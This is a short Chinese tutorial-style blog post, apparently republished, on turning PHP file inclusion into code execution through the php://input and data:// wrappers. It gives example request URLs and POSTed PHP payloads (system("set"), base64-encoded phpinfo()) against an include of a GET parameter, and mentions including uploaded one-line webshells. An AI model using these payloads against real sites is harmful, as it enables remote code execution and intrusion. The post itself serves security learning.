温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

LFI 命令执行

发布时间:2020-06-21 07:34:19 来源:网络 阅读:575 作者:serverxx0 栏目:安全技术

条件:

【条件】在allow_url_include = On 且 PHP >= 5.2.0

【优势】直接POST php代码并执行

【须知】必须使用包含切执行函数(比如 include require) 不能使用file_get_contents等 用这些函数不会执行data/input里面函数。

【点评】这其实是一种思路而已  当allow_url_include打开的时候  随便找个webshell上传一句话都可以远程包含了。

php://input

0x007.com/data.php?a=php://input

post提交:<?php  system("set");?>  任意的php代码


data:

include $_GET['a'];

0x007.com/data.php?a=data:text/plain,<?php phpinfo();

0x007.com/data.php?a=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=

0x007.com/data.php?a=data:;base64,PD9waHBpbmZvKCk7Lyo=


向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI